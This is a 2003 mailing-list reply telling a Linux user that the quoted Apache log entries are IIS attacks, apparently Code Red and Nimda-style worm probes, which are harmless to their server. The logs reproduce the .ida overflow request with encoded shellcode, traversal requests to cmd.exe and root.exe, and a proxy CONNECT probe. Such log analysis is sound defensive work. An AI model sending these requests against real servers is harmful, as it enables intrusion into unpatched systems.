I may be late on this, don't know if somebody already said this... But your apache log file indicates an "IIS ISAPI Overflow IDA" attack. This is an attack that exploits an IIS vulnerability. Unless you are running IIS on your Linux box, its not doing your system any harm. :-) See http://www.whitehats.com/IDS/552 <snip>
[snip] 80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET = /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /scripts/root.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /MSADC/root.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET = /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET = /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET = /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET = /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET = /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET = /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET = /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET = /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT = 193.109.122.7:2048/ HTTP/1.1" 400 340 80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET = /scripts/root.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET = /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET = /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir = HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET = /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET = /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET = /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET = /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET = /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET = /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET = /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629 80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET = /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX= XXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%= u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u= 0000%u00=3Da HTTP/1.0" 404 629 80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" = 401 477
[/snip]
<snip>>